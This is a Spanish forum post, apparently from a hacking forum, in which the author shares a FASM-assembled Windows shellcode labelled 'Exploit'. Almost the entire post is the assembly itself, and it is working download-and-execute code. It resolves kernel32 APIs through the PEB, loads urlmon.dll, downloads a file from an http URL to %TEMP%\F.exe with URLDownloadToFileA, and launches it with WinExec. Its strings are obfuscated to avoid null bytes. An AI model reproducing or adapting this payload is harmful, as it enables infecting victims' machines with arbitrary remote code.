Hice un ShellCode , ensamblado con FASM.
El ShellCode en si esta muy mal programado
Pesa 643 bytes , por razones de que no quiero usar el mismo que usa el publico no publico la version "perfeccionada"
Exploit:
use32
xor eax,eax
mov al,0x30
MOV ESI,DWORD[fs:eax]
MOV ESI,DWORD [ESI+0xC] ;GetKernel
MOV ESI,DWORD [ESI+0x1C]
.bucle:
MOV EDX,DWORD [ESI+0x8]
MOV EDI,DWORD [ESI+0x20]
MOV ESI,DWORD [ESI]
mov eax,NOT 0x320033
not eax
CMP DWORD[EDI+0xC],eax
JNZ .bucle
mov edi,edx
mov edi,dword[edi+0x3C]
add edi,edx
xor ecx,ecx
mov cl,0x78
mov esi,dword[edi+ecx]
add esi,edx
mov eax,[0x20+esi]
add eax,edx
mov ebx,eax
push esi
mov esi,[0x18+esi]
push ebx
xor ecx,ecx
Api:
.bucle:
dec esi
mov eax,esi
rol eax,2
mov eax,[ebx + eax]
add eax,edx
cmp dword[eax],'GetP'
jne .bucle
cmp dword[eax+4],'rocA'
jne .bucle
cmp dword[eax+8],'ddre'
jne .bucle
mov ecx,esi
pop ebx
pop esi
mov eax,[0x24+esi]
add eax,edx
movzx ecx, word[eax + 2*ecx]
mov eax, [esi + 0x1c]
add eax,edx
mov eax, [eax + 4 * ecx]
add eax, edx
mov ebx,eax ;Ebx = GetProcAddress
mov edi,edx ;Edi = Kernel32.dll
@@:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax ;1
mov edx,NOT 25 ; 6
NOT edx ; 7
add eax,edx ;8
jmp eax ;12
db "LoadLibraryA",1 ;13
sub al,13
mov ecx,eax
add cl,12
dec byte[ecx]
sub cl,12
push ecx
push edi
call ebx
mov esi,eax ; esi = LoaddLibraryA
mov edx,eax
push edx
_2:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax ;1
mov edx,NOT 24 ; 6
NOT edx ; 7
add eax,edx ;8
jmp eax ;12
db "GlobalAlloc",1 ;11
sub al,12
mov ecx,eax
add cl,11
dec byte[ecx]
push edx
sub cl,11
push ecx
push edi
call ebx
mov ecx,NOT 260
not ecx
push ecx
mov ecx,NOT 0x0040
not ecx
push ecx
call eax
pop edx
pushad
mov esi,eax
_3:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax ;1
mov edx,NOT 36 ; 6
NOT edx ; 7
add eax,edx ;8
jmp eax ;12
db "GetEnvironmentVariableA",1 ;11
dec eax
dec byte[eax]
sub eax,23
push eax
push edi
call ebx
mov ecx,NOT 260
NOT ECX
push ecx
push esi
push eax
_4:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax ;1
mov edx,NOT 17 ; 6
NOT edx ; 7
add eax,edx ;8
jmp eax ;12
db "TEMP",1 ;11
dec eax
dec byte[eax]
sub eax,4
mov ecx,eax
pop eax
push ecx
call eax
popad
mov ebp,eax
_1:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax ;1
mov edx,NOT 23 ; 6
NOT edx ; 7
add eax,edx ;8
jmp eax ;12
db "urlmon.dll",1 ;11
sub al,11
mov ecx,eax
add cl,10
dec byte[ecx]
sub cl,10
push ecx
call esi
mov esi,eax
mov ecx,ebp
xor edx,edx
.bucle:
inc ecx
cmp byte[ecx],dh
jne .bucle
mov byte[ecx],'\'
inc ecx
mov dword[ecx],'F.ex'
mov ax,NOT 0x0065
NOT ax
mov word[ecx+4],ax ;db 'e',0
_6:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax ;1
mov edx,NOT 31 ; 6
NOT edx ; 7
add eax,edx ;8
jmp eax ;12
db "URLDownloadToFileA",1 ;11
sub al,19
mov ecx,eax
add cl,18
dec byte[ecx]
push eax
push esi
call ebx
mov esi,eax
xor edx,edx
push edx
push edx
push ebp
_7:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax ;1
mov edx,NOT finurl ; 6
NOT edx ; 7
add eax,edx ;8
jmp eax ;12
url :
db "http://foro.elhacker.net/Themes/converted/selogo.jpg",1 ;11
finurl = $ -url + 12
dec eax
dec byte[eax]
xor edx,edx
mov dx,NOT finurl
NOT dx
sub dl,13
sub eax,edx
push eax
xor edx,edx
push edx
;int 3
call esi
_8:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax ;1
mov edx,NOT 20 ; 6
NOT edx ; 7
add eax,edx ;8
jmp eax ;12
db "WinExec",1 ;11
dec eax
dec byte[eax]
sub al,7
push eax
push edi
call ebx
xor ecx,ecx
inc ecx
push ecx
push ebp
call eax
;int 3
ret
Autor
En línea
